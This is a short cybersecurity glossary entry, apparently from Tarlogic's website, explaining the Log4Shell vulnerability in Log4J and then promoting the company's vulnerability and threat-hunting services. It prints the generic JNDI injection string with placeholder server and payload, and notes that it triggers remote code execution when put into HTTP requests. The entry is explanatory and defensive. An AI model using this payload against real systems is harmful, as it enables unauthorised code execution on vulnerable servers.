cybersecurity Glossary

What is Log4Shell?

Log4Shell is a remote vulnerability that affects the Java Log4J component used by thousands of applications to keep logs of application activity.

The name Log4Shell was assigned to the vulnerability identified by Miter as CVE-2021-44228 and it took advantage of a data filtering flaw that reaches this component, allowing a JNDI injection to be carried out. Through this flaw it was possible to inject specially crafted strings that allowed arbitrary code execution.

In most cases, it was simply necessary to add this content to any HTTP request to force the Log4J component to establish a connection against the attacker’s ldap server and execute arbitrary code.

${jndi:ldap://[server]/[payload]}

Various technical articles concerning Log4Shell and cybersecurity have been released on Tarlogic’s web page.

Vulnerability management: This continuous vulnerability assessment service allows for managing the vulnerability life cycle and minimizing the exposure surface.

Emerging vulnerabilities: This service is triggered when a critical vulnerability, like Log4Shell, that could impact your organization’s perimeter is published, enabling early reaction. We examine the impact of zero-day vulnerabilities on the perimeter 24 hours a day, 7 days a week, and pinpoint affected assets.

Threat Hunting: A managed service focused on the proactive detection of of suspicious behavior and threat containment in endpoints, utilizing telemetry produced by EDR and XDR technologies, and adhering to the methodology outlined in the MITRE ATT&CK framework.